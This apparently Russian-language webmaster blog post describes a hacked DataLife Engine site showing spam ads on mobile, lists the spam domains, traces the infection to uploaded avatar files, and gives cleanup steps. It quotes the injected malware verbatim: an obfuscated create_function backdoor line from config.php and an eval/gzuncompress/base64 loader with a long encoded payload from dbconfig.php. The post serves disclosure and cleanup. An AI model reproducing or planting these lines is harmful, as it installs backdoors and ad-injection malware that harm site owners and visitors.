😎 » DARYA DLE » Новости DLE » Спам реклама DLE в мобильной версии
146 0  

Спам реклама DLE в мобильной версии

Скорее всего кто-то умудрился импортировать свой рекламный код в скрипты ДЛЕ - теперь реклама показывается в мобильных устройствах, причем только один раз на один сеанс. Я так и не смог определить какой скрипт дал трещину....

Хакнули DLE

Пока определил такие рекламные ссылки:
 - http://w3-org.cc/
 - https://placewithprize.life/?u=46q82k7&o=872kvzr&t=30main2&cid=917903
 - genericstorageplace.com/away

РЕЗУЛЬТАТ!

Оказалось что вредоносный код создается в корне сайта в папке - license.php


am генерится он с любого файла включая .htaccess.

belay В моем случае это была аватарка: - /uploads/foto/foto_56445919.jpeq и foto_61738827.jpeq
Поэтому - ПОЛНАЯ Замена всех файлов движка на лицензионные. + удалить аватарки с папки /uploads/fotos/

Ставим запрет на закачку аваторок - Настроука картинок - размер аватарки ставим - 1

belay Также в config.php была такая строка -

$lic_true = "cre"."ate_"."function";if(@function_exists($lic_true)){@$dle_conf = $lic_true('', "$dle_lic;");$dle_conf('');}  

А в dbconfig:

@eVAl(gzUncOmprEss(base64_decode('eF6VVQtv2zYQ/isOYJgS6sqxkyZODKFpC6MNNqxbmmwY2lSgxLPEWiI1PuIYu/z3HeWmecBwMcDmHe/53fFI9a0265RlGeslzNuwguk2MiwiYzO5iKS14KJ+9u7jx1/O55/7wek6jv89I3Gh9VJC1MmGz0xejIdONhDFL6ZH08nhkI1YPLujgNHZM8s0ZdPxq8PJq+Mpi7XZoT/ZrZ/u/0Q/ZtuAs/3J+HhydDCZHLIHzCcH4w3mvjcypZif5hd/zi8+s4v5H1fzT5fZ1cU5u571zeKR0jpj4CYi4rRvWzARM2BgQX1tnasoPXko63yhjNCiWLUF+JQt2OysX2mb7grkrK4eRakbqWqtlLstypsSUpbbJSM48BM80vjMWfD/gOkCVcAFyb9bsoPXsgynXyRuMxEurKOWNxAYJ+2I8gQDqDoyKopAE9sGwpuXP+w6x9ONnGD3TlXgtHS8c9S/spjowII2XaZFSsTwlTc1qEILOh+z6Exabii/A5N+6S9hvdJGkBttLAy8Scfkt6XS9HHrB1Tss+iscq49HQWcofm0knkch6GPxvsnh1/DEg8GPWkzbgxfR8FseN/cYUAXU0L6RZ3rDG6lm931vS13n4FTUPLMgPWPDvR/D1LAufcwlx8uL3/PrmiXvXk//+2SXYe7sENN16K7LnutgTJruCuqiI1yLoVHyaniokKtyxpQlg3Ht9ohVwJuMSeulTQ0OK8dP1dYUE+RV1ojb3Ky/+vgXYZ/87dGr5A6HiQlOGy4rJORZMPQoJhuIhXwJHcXPqHYio4aN0g6J4MWOjy2kRO0utQebQWKYEm6TbzEdUifYGNVUqB3PgfUQukl8Um+3lTQgTO4ki6E18vEeLxZJoVGX+sSF7yAnGJ0NScofLEMf1T8hsy5rimyyYsEc6nKTR1hAEIVT8tok5wqt+SkhNFSYCNFi+sml1xh5YqMBEqiJYm2qHNJDfo2aQDBSLBfekf72FZawUOrqDHR3rOHmIkaMk9ZMinorLfa3D/Wne4JxpQLoWBlkQsCk7RVi2kd+uowXQCInFPlJLjXka+0oW2dPbGGO6nVBqKRmxSB6+2lvfBsbntnv7/ix2zbl+Hu7j8TqTRh'))); 


-----
А вобще процедура лечения такова:

  1. 1 Делаем копию базы данных через админку
  2. 2 Делаем копию сайта на локальную машину.
    2.2 Сохраняем плагины если есть.
  3. 3 Удаляем все КРОМЕ корневой папки /upload/ и /engine/data/
  4. 4 Удалить аватарки с папки /uploads/fotos/ включая файл .htaccess
  5. 5 Загружаем лицензионные файлы - ТОЙ же ВЕРСИИ. (версию движка можно посмотреть в файле engine/data/config.php)
    bully Помните про то что у Вас могут быть свои изминения в robots.txt и .htacces.
  6. 6 Возвращаем назад старую папку /engine/data/ - и файлы: config.php и dbconfig.php проверить на чужой код.
  7. 7 Заходим в админку и проверяем еще раз настройки.

Залишити свій коментар:

Досвід у веброзробці:

2009
2010
2011
2012
2013
2014
2015
2016
2017
2018
2019
2020
2021
2022
2023
2024
2025
2026
2027
2028
2009
2023